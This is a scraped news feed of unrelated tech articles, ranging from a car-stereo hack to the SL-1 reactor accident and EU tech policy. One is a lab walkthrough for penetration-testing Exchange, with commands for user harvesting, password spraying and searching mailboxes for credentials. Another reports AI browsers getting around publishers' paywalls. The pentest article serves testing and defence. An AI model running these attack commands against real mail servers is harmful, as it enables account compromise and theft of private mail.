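    diameter = math.sqrt(4 * area / math.pi)        # equivalent rope diameter
    gap = line_spacing - diameter
    status = "touches its neighbour" if gap <= 0 else f"{gap:.3f} mm gap left"
    print(f"flow {bridge_flow:.2f}: rope {diameter:.3f} mm -> {status}")

In this crude picture, stock flow leaves a clear gap between neighbouring ropes, which matches the poor adhesion described above, and only a substantially raised Bridge Flow closes it.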

All the latest is on the project page where you can download his test models, so if you’re of a mind to give it a try be sure to check it out and share your results. Watch a short video demonstrating everything, embedded just under the page break.

Thanks to [Hari] for the tip!

youtube.com/embed/xQBLv3cPUbo?…


hackaday.com/2025/11/05/better…


Penetration Testing Microsoft Exchange Server: Techniques, Tools, and Countermeasures


During penetration tests, we often end up with elevated access (Domain Admin) inside an organization. Some companies stop there, assuming that obtaining Domain Admin is the end goal.

It isn't. "Getting Domain Admin" doesn't mean much to most executives unless you show concretely what it implies in terms of risk. One of the best ways to demonstrate risk to an organization is to show that its sensitive data can be reached.

Here we walk through penetration testing of Exchange 2019 in a GOADv3 lab set up on Ludus/Debian.


The target Exchange server

Tools Used


The main toolkit used is MailSniper, a PowerShell suite designed for internal enumeration and abuse of Exchange mailboxes via Exchange Web Services (EWS), Outlook Web Access (OWA), and other standard endpoints.

I also used NetExec from a Kali machine, but MailSniper misbehaved under PowerShell on Linux, so I had to fall back on a Windows 11 Pro box:
MailSniper refused to work on Kali. Here, the NXC scan of the entire environment.

Phase 1: Reconnaissance and Identification of the Exchange Server


Before any penetration activity, it is essential to locate the Exchange server precisely.

  • Start with OSINT collection: DNS MX records, public OWA URLs, Autodiscover, TLS certificates, and metadata visible in job postings or public documents.
  • Then run targeted Nmap scans against the standard services:


nmap -p25,80,443,445,587,993,995 -sV -oA exchange_scan 10.3.10.21
This scan identifies the ports for SMTP, HTTPS (OWA), SMB, and secure mail services.

# Nmap 7.95 scan initiated Wed Oct 15 12:52:25 2025 as: /usr/lib/nmap/nmap --privileged -A -T 4 -Pn -oA /mnt/hgfs/VMsharedDownloads/Exchange2019InitialScan 10.3.10.21
Nmap scan report for 10.3.10.21
Host is up (0.0027s latency).
Not shown: 975 closed tcp ports (reset)
PORT STATE SERVICE VERSION
25/tcp open smtp Microsoft Exchange smtpd
|_smtp-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=the-eyrie
| Subject Alternative Name: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-11T01:42:31
|_Not valid after: 2030-10-11T01:42:31
| smtp-commands: the-eyrie.sevenkingdoms.local Hello [198.51.100.2], SIZE 37748736, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, SMTPUTF8, XRDST
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title.
81/tcp open http Microsoft IIS httpd 10.0
|_http-title: 403 - Forbidden: Access is denied.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/https
| ssl-cert: Subject: commonName=the-eyrie
| Subject Alternative Name: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-11T01:42:31
|_Not valid after: 2030-10-11T01:42:31
| http-title: Outlook
|_Requested resource was 10.3.10.21/owa/auth/logon.aspx…
444/tcp open snpp?
445/tcp open microsoft-ds?
465/tcp open smtp Microsoft Exchange smtpd
| ssl-cert: Subject: commonName=the-eyrie
| Subject Alternative Name: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-11T01:42:31
|_Not valid after: 2030-10-11T01:42:31
| smtp-commands: the-eyrie.sevenkingdoms.local Hello [198.51.100.2], SIZE 37748736, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH GSSAPI NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, SMTPUTF8, XRDST, XSHADOWREQUEST
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
| Target_Name: SEVENKINGDOMS
| NetBIOS_Domain_Name: SEVENKINGDOMS
| NetBIOS_Computer_Name: THE-EYRIE
| DNS_Domain_Name: sevenkingdoms.local
| DNS_Computer_Name: the-eyrie.sevenkingdoms.local
| DNS_Tree_Name: sevenkingdoms.local
|_ Product_Version: 10.0.17763
587/tcp open smtp Microsoft Exchange smtpd
| ssl-cert: Subject: commonName=the-eyrie
| Subject Alternative Name: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-11T01:42:31
|_Not valid after: 2030-10-11T01:42:31
| smtp-commands: the-eyrie.sevenkingdoms.local Hello [198.51.100.2], SIZE 37748736, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, SMTPUTF8
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
|_smtp-ntlm-info: ERROR: Script execution failed (use -d to debug)
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
808/tcp open ccproxy-http?
1801/tcp open msmq?
2103/tcp open zephyr-clt?
2105/tcp open eklogin?
2107/tcp open msmq-mgmt?
2525/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: the-eyrie.sevenkingdoms.local Hello [198.51.100.2], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, SMTPUTF8, XRDST, XSHADOWREQUEST
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| ssl-cert: Subject: commonName=the-eyrie
| Subject Alternative Name: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-11T01:42:31
|_Not valid after: 2030-10-11T01:42:31
3389/tcp open ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: SEVENKINGDOMS
| NetBIOS_Domain_Name: SEVENKINGDOMS
| NetBIOS_Computer_Name: THE-EYRIE
| DNS_Domain_Name: sevenkingdoms.local
| DNS_Computer_Name: the-eyrie.sevenkingdoms.local
| DNS_Tree_Name: sevenkingdoms.local
| Product_Version: 10.0.17763
|_ System_Time: 2025-10-15T16:52:55+00:00
| ssl-cert: Subject: commonName=the-eyrie.sevenkingdoms.local
| Not valid before: 2025-10-07T10:19:37
|_Not valid after: 2026-04-08T10:19:37
3800/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
3801/tcp open mc-nmf .NET Message Framing
3828/tcp open mc-nmf .NET Message Framing
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
5986/tcp open wsmans?
| ssl-cert: Subject: commonName=WIN2019-SRV-X64
| Subject Alternative Name: DNS:WIN2019-SRV-X64, DNS:WIN2019-SRV-X64
| Not valid before: 2025-09-19T18:32:07
|_Not valid after: 2035-09-17T18:32:07
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6789/tcp open ibm-db2-admin?
Device type: general purpose
Running: Microsoft Windows 2019
OS CPE: cpe:/o:microsoft:windows_server_2019
OS details: Microsoft Windows Server 2019
Network Distance: 3 hops
Service Info: Host: the-eyrie.sevenkingdoms.local; OS: Windows; CPE: cpe:/o:microsoft:windows

Phase 2: User and Mail Endpoint Enumeration


After locating the server, the next step is gathering valid usernames, which is essential for attacks such as password spraying or brute force.

With MailSniper, users can be harvested from the OWA endpoint and from the Global Address List (GAL):

Invoke-UsernameHarvestOWA -UserList .\users.txt -ExchHostname 10.3.10.21 -Domain SEVENKINGDOMS -OutFile AccountsTrovati.txt


Invoke-DomainHarvestOWA -ExchHostname 10.3.10.21 -OutFile userlist.txt
Get-GlobalAddressList -ExchHostname 10.3.10.21 -UserName "domain\user" -Password "Password!" -OutFile gal.txt
A well-defined user list makes it possible to simulate targeted attacks, testing realistic, context-based passwords (e.g., the Game of Thrones-themed names used in the lab); naturally, this builds on various OSINT techniques carried out beforehand.
MailSniper simply extracts the users from the list Exchange already knows about, shown here.


Phase 3: Password Spraying and Initial Access


Using realistic passwords derived from public and contextual information, password spraying is carried out with MailSniper against ActiveSync (EAS), OWA, or SMTP:
Invoke-PasswordSpray -UserList userlist.txt -ExchHost 10.3.10.21 -Password "ilovejaime" -OutFile spray_results.txt

Once a valid login is found, i.e., a working username/password combination, PowerShell can be used to access the mailbox via EWS and begin the post-exploitation phase.


The credentials are correct:
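As an aside, the same EWS access can be scripted outside PowerShell. Below is a minimal sketch using the third-party Python exchangelib library; the username, password, and addresses are placeholders standing in for the lab credentials, and the certificate-verification override is only appropriate in a lab full of self-signed certificates.

# pip install exchangelib -- minimal EWS mailbox access sketch (lab use only)
from exchangelib import Account, Configuration, Credentials, DELEGATE
from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter

BaseProtocol.HTTP_ADAPTER_CLS = NoVerifyHTTPAdapter  # lab uses self-signed TLS

creds = Credentials(username="SEVENKINGDOMS\\someuser",  # placeholder account
                    password="ilovejaime")
config = Configuration(server="10.3.10.21", credentials=creds)
account = Account(primary_smtp_address="someuser@sevenkingdoms.local",
                  config=config, autodiscover=False, access_type=DELEGATE)

# List the ten most recent inbox items, flagging likely credential material.
for item in account.inbox.all().order_by("-datetime_received")[:10]:
    flag = "!" if "password" in (item.subject or "").lower() else " "
    print(flag, item.datetime_received, item.subject)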

Post-Exploitation and Hunting for Sensitive Information


With MailSniper, from a compromised account, you can:

  • Search the compromised mailbox for credentials or other sensitive information:

Invoke-SelfSearch -Mailbox compromised@domain.local -Terms "password","vpn","confidential"


  • Enumerate attachments and download them for offline analysis:

Invoke-SelfSearch -Mailbox compromised@domain.local -CheckAttachments -DownloadDir C:\loot\


  • If you hold an administrative role with impersonation rights, expand the search globally across the network's mailboxes:

Invoke-GlobalMailSearch -ImpersonationAccount "domain\admin" -ExchHostname 10.3.10.21 -Terms "password","confidential" -OutputCsv all_mail_search.csv

Lateral Movement and Privilege Escalation


Access to mailboxes makes it possible to hunt for credentials of privileged accounts (e.g., Domain Admin), which often turn up in attachments or messages.

With those credentials you can:

  • Access internal systems via RDP or PowerShell remoting.
  • Use techniques such as Kerberoasting (requesting Kerberos tickets for Exchange services) to obtain hashes for offline cracking.
  • Abuse Exchange delegations and mailbox permissions to send "Send As" mail and move through the domain.

Useful commands for auditing mailbox permissions:

Invoke-MailboxPermsAudit -ExchHostname 10.3.10.21 -UserName "domain\user" -Password "password" -OutFile mailbox_permissions.csv

Recommended Defenses Against Attacks on Exchange


To mitigate the risks highlighted above:

  • Restrict mailbox permissions and delegation: only strictly necessary roles should be able to impersonate others or send mail on their behalf.
  • Monitor Exchange activity: in-depth logging of authentications, EWS usage, and suspicious mail attempts.
  • Patch promptly: install fixes for known vulnerabilities such as ProxyLogon, ProxyShell, and emerging zero-days.
  • Enforce Multi-Factor Authentication (MFA) on OWA, EAS, and PowerShell remoting to blunt credential stuffing.
  • Segment the network: isolate Exchange servers and restrict access from the DMZ and internal zones according to least-privilege principles.
  • Detect and block password spraying: lockout policies, behavioral analysis, and internal tooling to flag suspicious logons.

(Image: network diagram with segmentation and access controls)

Conclusions


Penetration testing an Exchange Server 2019 calls for a structured methodology, from careful reconnaissance, through targeted attacks such as password spraying, to post-compromise abuse of mailboxes to advance through the network.

The GOADv3 lab on Ludus/Debian provides an ideal environment for simulating these techniques safely, sharpening offensive skills and, above all, testing IT defenses.

Tools like MailSniper make it easy to hunt for credentials, permissions, and sensitive data, concretely demonstrating the risk that an Exchange compromise poses to an organization.

Implementing robust defenses and continuous monitoring is the key to shrinking the attack surface and slowing down today's adversaries.


The article "Penetration Testing di Microsoft Exchange Server: Tecniche, Strumenti e Contromisure" was originally published on Red Hot Cyber.


Hacking Buttons Back Into the Car Stereo


To our younger readers, a car without an all-touchscreen "infotainment" system may look clunky and dated, but really, you kids don't know what you're missing. Buttons, knobs, and switches all offer a level of satisfying tactility and feedback that touchscreens totally lack. [Garage Builds] on YouTube agrees; he also doesn't like the way his aftermarket Kenwood head unit looks in his 2004-vintage Nissan. That's why he decided to take matters into his own hands, and hack the buttons back on.

Rather than source a vintage stereo head unit, or try and DIY one from scratch, [Garage Builds] has actually hidden the modern touchscreen unit behind a button panel. That button panel is actually salvaged from the stock stereo, so the looks fit the car. The stereo’s LCD gets replaced with a modern color unit, but otherwise it looks pretty stock at the end.

Adding buttons to the Kenwood is all possible thanks to steering-wheel controls. In order to make use of those, the touchscreen head unit came with a little black box that translated the button press into some kind of one-wire protocol that turned out to be an inverted and carrier-less version of the NEC protocol used in IR TV remotes. (That bit of detective work comes from [michaelb], who figured all this out for his Ford years ago, but [Garage Builds] is also sharing his code on GitHub.)
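For reference, a standard NEC frame is a 9 ms leader mark, a 4.5 ms gap, then 32 bits (address, inverted address, command, inverted command, sent LSB first), each encoded in the length of the space following a fixed-width mark. Here's a minimal sketch of that framing in Python; the timing constants are the textbook NEC values, not the specific codes [michaelb] decoded for the Kenwood box, and the level inversion matches the wired, carrier-less variant described above.

def nec_frame(address: int, command: int) -> list[tuple[int, float]]:
    """Return (line level, duration in microseconds) pairs for one NEC frame."""
    MARK, SPACE = 0, 1  # idle-high wire, so marks are driven low ("inverted")
    frame = [(MARK, 9000.0), (SPACE, 4500.0)]  # leader burst and gap

    # 32 data bits, sent LSB first: address, ~address, command, ~command.
    payload = (address & 0xFF) | ((~address & 0xFF) << 8) \
        | ((command & 0xFF) << 16) | ((~command & 0xFF) << 24)
    for i in range(32):
        bit = (payload >> i) & 1
        frame.append((MARK, 562.5))  # every bit starts with a fixed-width mark
        frame.append((SPACE, 1687.5 if bit else 562.5))  # space length = bit
    frame.append((MARK, 562.5))  # trailing stop mark
    return frame

# Hypothetical address/command values, purely for illustration:
print(nec_frame(0x04, 0x1E)[:4])  # leader plus the first data bit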

With the protocol in hand, it simply becomes a matter of grabbing a microcontroller to scan the stock buttons and output the necessary codes to the Kenwood head unit. Of course now he has extra buttons, since the digital head unit has no tape or CD changer to control, nor AM/FM radio to tune. Those get repurposed for the interior and exterior RGB lighting [Garage Builds] has ̶i̶n̶f̶l̶i̶c̶t̶e̶d̶ mounted on this ̶p̶o̶o̶r̶ lovely car. (There’s no accounting for taste. Some of us love the look and some hate it, but he’s certainly captured an aesthetic, and now has easy control of it to boot.) [Garage Builds] has got custom digital gauges to put into the dash of his Nissan, and some of the extra buttons have been adapted to control those, too.

The whole car is actually a rolling hack as you can see from the back catalog of the [Garage Builds] YouTube channel, which might be worth a look if you’re in the intersection of the “electronics enthusiast” and “gearhead” Venn Diagram.

There’s no accounting for taste, but we absolutely agree with him that making everything black rectangles is the death of industrial design.

This isn’t the first time we’ve seen retro radios hacked together with micro-controllers; take a look at this one from a 1970s Toyota. Now that’s vintage!


hackaday.com/2025/11/05/hackin…


2025 Component Abuse Challenge: The Ever-Versatile Transistor as a Temperature Sensor


One of the joys of writing up the entries for the 2025 Component Abuse Challenge has come in finding all the different alternative uses for the humble transistor. This building block of all modern electronics does a lot more than simply performing as a switch, for as [Aleksei Tertychnyi] tells us, it can also function as a temperature sensor.

How does this work? Simple enough: the base-emitter junction of a transistor can function as a diode, and like other diodes, its forward voltage shifts with temperature, by roughly −2 mV per degree Celsius (for a silicon transistor, anyway). Forward biasing the junction through a 33 K resistor, he can read the resulting voltage directly with an analogue to digital converter and derive a temperature reading.
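As a back-of-the-envelope illustration, the conversion might look like the following Python sketch, assuming a 10-bit ADC, a 3.3 V reference, and a one-point calibration; the calibration values are placeholders you would measure for your own transistor.

# Minimal conversion sketch: 10-bit ADC, 3.3 V reference, one-point
# calibration. V_CAL/T_CAL are assumptions; measure your own junction.
V_REF = 3.3
ADC_MAX = 1023
V_CAL = 0.608      # measured V_be at T_CAL (placeholder calibration)
T_CAL = 25.0       # degrees C
SLOPE = -0.002     # volts per degree C, textbook silicon-junction figure

def adc_to_celsius(raw: int) -> float:
    v_be = raw * V_REF / ADC_MAX
    return T_CAL + (v_be - V_CAL) / SLOPE

print(adc_to_celsius(185))  # ~30.6 C for this example calibration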

The transistor rarely features as anything but a power device in the projects we bring you in 2025. Maybe you can find inspiration to experiment for yourself, and if you do, you still have a few days in which to make your own competition entry.

2025 Hackaday Component Abuse Challenge


hackaday.com/2025/11/05/2025-c…


The Deadliest US Nuclear Accident is Not What You Think


When you think of a US Nuclear accident, you probably think of Three Mile Island. However, there have been over 50 accidents of varying severity in the US, with few direct casualties. (No one died directly from the Three Mile Island incident, although there are some studies that show increased cancer rates in the area.)

Indeed, even where there have been fatalities, they haven’t really been related to the reactor. Take the four people who died at the Surry Nuclear Power Plant: they were killed when a steam pipe burst and fatally scalded them. At Arkansas Nuclear One, a 525-ton generator was being moved, the crane failed to hold it, and one person died. That sort of thing could happen in any kind of industrial setting.

But one incident that you have probably never heard of took three lives as a direct result of the reactor. True, it was a misuse of the reactor, and it led to design changes to ensure it can’t happen again. And while the incident was nuclear-related, the radiation didn’t kill them, although it probably would have if they had survived their injuries.

Background

The large cylinder housed the SL-1 reactor. The picture is from some time before the accident (public domain).
It may be a misattribution, but it is often said that Napoleon said something like, “An army marches on its stomach.” A modern army might just as well march on electrical power. So the military has a keen interest in small nuclear reactors to both heat sites in cold climates and generate electricity when in remote locations or in, as they like to call it, denied areas.

In the mid-1950s, the Army tasked Argonne National Laboratory with prototyping a small reactor. They wanted it portable, so it had to break down into relatively small pieces (if you consider something weighing 10 tons as small) that could be set up in the field.

The resulting prototype was the Stationary Low-Power Reactor Number One, known as SL-1, operated by the Army in late 1958. It could provide about 400 kW of heating or 200 kW of electricity. The reactor core was rated for 3 MW (thermal) but had been tested at 4.7 MW a few times. It would end operations due to an accident in 1961.

Design

Sketch of the reactor internals (public domain).
The reactor was a conventional boiling-water reactor design that used natural circulation of light water as both coolant and moderator. The fuel was in the form of plates of a uranium-aluminum alloy.

The reactor was inside a 48-foot-tall cylinder 38.5 feet in diameter. It was made of quarter-inch plate steel. Because the thing was in the middle of nowhere in Idaho, this was deemed sufficient. There was no containment shell like you’d find on reactors nearer to population centers.

The reactor, at the time of the accident, had five control rods, although it could accommodate nine. It could also hold 59 fuel assemblies, but only 40 were in use. Because of the reduced number of fuel plates, the reactor’s center region was more active than it would have been under full operation. Eight rod positions formed a circle, four of them filled with dummy rods, with the ninth position at the center. Because of the missing outer rods, the center control rod carried far more reactivity than the other four.

The Accident


In January of 1961, the reactor had been shut down for 11 days over the holiday. In preparation for restarting, workers had to reconnect the rods to their drive motors. The procedure was to pull the rod up four inches to allow the motor attachment.
Cutaway of the SL-1 and the control building (public domain).
There were three workers: Specialist Richard McKinley, Specialist John Byrnes, and a Navy Seabee Electrician First Class Richard Legg. Legg was in charge, and McKinley was a trainee.

From a post-accident investigation, they are fairly sure that Byrnes inexplicably pulled the center rod out 20 inches instead of the requisite four inches. The reactor went prompt critical, and, in roughly four milliseconds, the 3 MW core reached 20 GW. There wasn’t enough time for sufficient steam to form to trigger the safeties, which took 7.5 milliseconds.

The extreme heat melted the fuel, which explosively vaporized. The reactor couldn’t dissipate so much heat so quickly, and a pressure wave of about 10,000 psi hit the top of the reactor vessel. The 13-ton vessel flew up at about 18 miles an hour, and plugs flew out, allowing radioactive boiling water and steam to spray the room. At about nine feet, it collided with the ceiling and a crane and fell back down. All this occurred in about two seconds.

As you might imagine, you didn’t want to be in the room, much less on top of the reactor. Two of the operators were thrown to the floor. Byrnes’ fall caused a rib to fatally pierce his heart. McKinley was also badly injured and survived for only about two hours after the accident. Legg was found dead and pinned to the ceiling, impaled by an ejected shield plug.

Why?

Actual photo of the destroyed reactor taken by a camera on the end of a crane.
You can place a lot of blame here. Of course, you probably shouldn’t have been able to pull the rod up that far, especially given that it was carrying more of the load than the other rods. The contractor that helped operate the facility wasn’t available around the clock due to “budget reasons.” There’s no way to know if that would have helped, of course.

But the real question is: why did they pull the rod up 20 inches instead of four? We may never know. There are, of course, theories. Improbably, people have tried to explain it as sabotage or murder-suicide due to some dispute between Byrnes and one of the other men. But that doesn’t seem to be the most likely explanation.

Apparently, the rods sometimes stuck due to misalignment, corrosion, or wear. During a ten-month period, for example, about 2.5% of the drop-and-scram tests failed because of this sticking: a total of 40 incidents. However, many of those causes only apply when the rods are automatically moved. Logbooks showed that manual movement of the rods had been done well over 500 times. There was no record of any sticking during manual operations. Several operators were asked, and none could recall any sticking. However, the rate of sticking was increasing right before the incident, just not from manual motion.

However, it is easy to imagine the 48-pound rod being stuck, pulling hard on it, and then having it give way. We’ve all done something like that, just not with such dire consequences.

Aftermath


First responders had a difficult time with this incident due to radiological problems. There had been false alarms before, so when six firefighters arrived on the scene, they weren’t too concerned. But when they entered the building, they saw radiation warning lights on and their radiation detectors pegged.

Even specialized responders with better equipment couldn’t determine just how much radiation was there, except for “plenty.” Air packs were fogging, limiting visibility. During the rescue of McKinley, one rescuer had to remove a defective air pack and breathe contaminated air for about three minutes. Freeing Legg’s body required ten men working in pairs, because each team could only work in the contaminated zone for 65 seconds. The rule had been that you could tolerate 100 Röntgens (about 1 Sv or 100 rem) to save a life and 25 (0.25 Sv or 25 rem) to save valuable property. Of the 32 people involved in the initial response, 22 received between 3 and 27 Röntgens exposure. Further, 790 people were exposed to harmful radiation levels during the subsequent cleanup.

The reactor building did prevent most of the radioactive material from escaping, but iodine-131 levels in some areas reached about 50 times normal levels. The remains of the site are buried nearby, and that’s the source of most residual radiation.

Lessons Learned


Unsurprisingly, the SL-1 design was abandoned. Future designs require that the reactor be safe even if one rod is entirely removed: the so-called “one stuck rod” rule. This also led to stricter operating procedures. What’s more, it is now necessary to ensure emergency responders have radiation meters with higher ranges. Regulations are often written in blood.

The Atomic Energy Commission made a film about the incident for internal use, but of course you can now watch it from your computer, below.

youtube.com/embed/gIBQMkd96CA?…

You might also enjoy this presentation by one of the first responders who was actually there, which you can see below. If you want a more detailed history, check out Chapters 15 and 16 of [Susan M. Stacy’s] book “Proving the Principle” that you can read online.

youtube.com/embed/gMNqPUT-yP0?…

Nuclear accidents can ruin your day. We are always surprised at how many ordinary mistakes happen at reactors like Browns Ferry.


hackaday.com/2025/11/05/the-de…


SolidWorks Certification… With FreeCAD?


There are various CAD challenges out there that come with bragging rights. Some, like the Certified SolidWorks Professional exam (CSWP), might actually look good on a resume. [Deltahedra] is apparently not too interested in padding his resume, nor does he have much interest in SolidWorks, and so decided to conquer the CSWP with FreeCAD in the name of open source — and to show us all how he did it.

Because these CAD exams are meant to show your chops with the program, the resulting video makes an awesome FreeCAD tutorial. Spoiler alert: he’s able to model the part, though it takes him about 15 minutes. After modeling the part, the CSWP exam needs you to find the mass of the part, which [Deltahedra] does with the FCInfo macro — which, of course, he shows us how to install and use. The second and third questions are similar: change some variables (it is a parametric modeling software, after all) and find the new mass. In a second exercise, he needs to modify the model according to a new drawing. Modifying existing models can sometimes be more difficult than creating them, but [Deltahedra] and FreeCAD pass with flying colors once again.
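If you would rather skip the macro, the core of what FCInfo reports can be reproduced in FreeCAD's built-in Python console. This is a minimal sketch, where the object name "Body" and the steel density are assumptions for illustration, not values from the exam.

# Run in FreeCAD's Python console: a bare-bones version of what the
# FCInfo macro reports. Shape.Volume is in mm^3, so convert before
# multiplying by density. "Body" and the density are placeholders.
import FreeCAD as App

obj = App.ActiveDocument.getObject("Body")
volume_mm3 = obj.Shape.Volume
density = 7800                              # kg/m^3, plain steel (assumed)
mass_g = volume_mm3 * 1e-9 * density * 1000 # mm^3 -> m^3 -> kg -> g
print(f"Volume: {volume_mm3:.2f} mm^3  Mass: {mass_g:.2f} g")

Because the model is parametric, changing a sketch dimension and re-running the two lines above answers the exam's "change a variable, find the new mass" questions directly.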

If you’re at all curious about what FreeCAD can do, this video is a really impressive demonstration of FreeCAD’s part modeling workbench. We’ve had a few FreeCAD guides of our own on Hackaday, like this one on reverse engineering STLs and this one on best practices in the software, but if you’d asked us before the release of v1.0 we’d never have guessed you could use it for a SolidWorks exam in 2025. So while there are kudos due to [Deltahedra], the real accolades belong to the hardworking team behind FreeCAD that has brought it this far. Bravo!

youtube.com/embed/VEfNRST_3x8?…


hackaday.com/2025/11/05/solidw…


Is the Paywall Era Over? Smart Browsers Get Around Them, and Policing Them Is Very Hard


How can publishers protect themselves from AI-powered “smart” browsers when those browsers look like ordinary users? The emergence of new AI-based “smart” browsers is challenging the traditional methods of protecting online content.

OpenAI’s recently released Atlas browser, along with Perplexity’s Comet and Microsoft Edge’s Copilot mode, are becoming tools that can do far more than render web pages: they carry out multi-step tasks, for example gathering calendar information and generating client briefings based on the news.

Their capabilities already pose serious challenges to publishers trying to limit AI’s use of their content. The problem is that these browsers are outwardly indistinguishable from ordinary users.

When Atlas or Comet accesses a site, it is identified as a standard Chrome session, not as an automated crawler. That makes it impossible to block via the robots exclusion protocol, since blocking such requests could simultaneously lock out ordinary users. TollBit’s “State of the Bots” report notes that the new generation of AI visitors is “increasingly human-like,” making such agents harder to monitor and filter.

AI-based browsers get a further advantage from the way modern paid subscriptions are built. Many sites, including MIT Technology Review, National Geographic, and the Philadelphia Inquirer, take a client-side approach: the article loads in full but is hidden behind a pop-up offering a subscription. The text stays invisible to humans, yet it is fully accessible to the AI. Only server-side paywalls, like those of Bloomberg or the Wall Street Journal, reliably hide content until the user logs in. Even then, if the user is logged in, an AI agent can freely read the article on their behalf.
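Publishers can audit which camp they fall into with something as simple as the following Python sketch: if a sentence from deep inside a subscriber-only article already appears in the raw HTML, the paywall is client-side. The URL and probe string are placeholders.

# Publisher-side audit sketch: does the raw HTML already contain the
# full article that the overlay is supposed to hide? Placeholders only.
import urllib.request

URL = "https://example.com/subscriber-only-article"   # placeholder
PROBE = "a sentence from deep inside the article"     # placeholder

html = urllib.request.urlopen(URL).read().decode("utf-8", errors="replace")
if PROBE in html:
    print("Client-side paywall: the text ships to every client, AI included.")
else:
    print("Text absent from initial HTML: likely enforced server-side.")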

OpenAI Atlas retrieved the full text of a subscriber-only article from MIT Technology Review (CJR).

In tests, Atlas and Comet easily extracted the full text of paywalled MIT Technology Review articles, despite the restrictions imposed on corporate crawlers like OpenAI’s and Perplexity’s.

In one case, Atlas even managed to reassemble a locked PCMag article by combining information from other sources, such as tweets, aggregators, and third-party quotations. This technique, dubbed the “digital breadcrumb” approach, was previously described by online research specialist Henk van Ess.

OpenAI says that content users view through Atlas is not used to train its models unless the “browser memories” feature is enabled. Still, “ChatGPT will remember key details of the pages viewed,” which, as Washington Post columnist Geoffrey Fowler has noted, makes OpenAI’s privacy policy confusing and inconsistent. It remains unclear to what extent the company uses data obtained from paywalled content.

A distinctly selective approach can be observed: Atlas avoids directly contacting sites that have filed lawsuits against OpenAI, such as the New York Times, but still tries to work around the block by compiling a summary of the topic from other outlets (The Guardian, Reuters, the Associated Press, and the Washington Post) that have licensing agreements with OpenAI. Comet, by contrast, shows no such restraint.

This strategy turns the AI agent into an intermediary that decides which sources count as “acceptable.” Even if a publisher manages to block direct access, the agent simply substitutes an alternative version of events for the original. That alters the very perception of information: the user receives not an article but an automatically generated interpretation.

AI-based browsers have not yet reached wide adoption, but it is already clear that traditional barriers like paywalls and crawler blocking are no longer effective. If such agents become the primary way people read the news, publishers will have to find new mechanisms to ensure transparency and control over how AI uses their content.

The article L’era dei Paywall è finita? I Browser intelligenti l’aggirano e controllarli è molto difficile originally appeared on Red Hot Cyber.


Europe's 'Jekyll and Hyde' tech strategy


WELCOME BACK TO DIGITAL POLITICS. I'm Mark Scott, and have partnered with YouGov and Microsoft for a dinner in Brussels on Dec 10 to recap the digital policymaking highlights of 2025 and to look ahead to what is in store for next year.

If you would like to attend, please let me know here. The event will include exclusive insight from YouGov on Europeans' attitudes toward technology. Spaces are limited, so let me know asap.

— November will again show how much the European Union is split over the bloc's strategy toward technology.

— The annual climate change talks begin in Brazil on Nov 10. The tech industry's impact has gone from bad to worse.

— Big Tech firms have massively increased their spending on tech lobbying within the EU institutions. Here are the stats.

Let's get started:


IT'S THE EU, AND IT'S HERE TO HELP


IT'S GOING TO BE A BUSY MONTH. On Nov 18, France and Germany will gather officials, industry executives and (just a few) civil society groups in Berlin for the so-called "Summit on European Digital Sovereignty." The one-day conference (as well as a series of side events) is aimed at figuring out what the European Union's position on the topic should be — despite the concept of digital sovereignty having done the rounds in Brussels for more than five years.

Then, on Nov 19, the European Commission is expected to announce its so-called "Digital Omnibus," a Continent-wide effort to simplify the bloc's tech rules, focused primarily on the Artificial Intelligence Act, General Data Protection Regulation, Cybersecurity Act and the ePrivacy Directive. It's a response to the competitiveness report written by Mario Draghi, the former Italian prime minister, which suggested (without much evidence) that Europe's complex digital rulebook was a major reason why the Continent had failed to compete with the likes of China and the United States.

The one-two punch of the Digital Sovereignty summit and the Digital Omnibus represents the two countervailing strategies toward technology that are battling for supremacy in Brussels and other EU member capitals.

There's a long history about why France and Germany still don't see eye-to-eye on digital sovereignty. Paris would prefer to create national (read: French) tech champions that can then compete globally. Berlin would prefer to work with allies on tech issues, though the newly-installed government is starting to change its tune.

Thanks for reading the free monthly version of Digital Politics. Paid subscribers receive at least one newsletter a week. If that sounds like your jam, please sign up here.

Here's what paid subscribers read in October:
— How social media failed to respond to the highest level of global conflict since WWII; The fight over semiconductors between China and the US is worsening the "splinternet;" DeepSeek's vaunted success may not be what it first appears. More here.
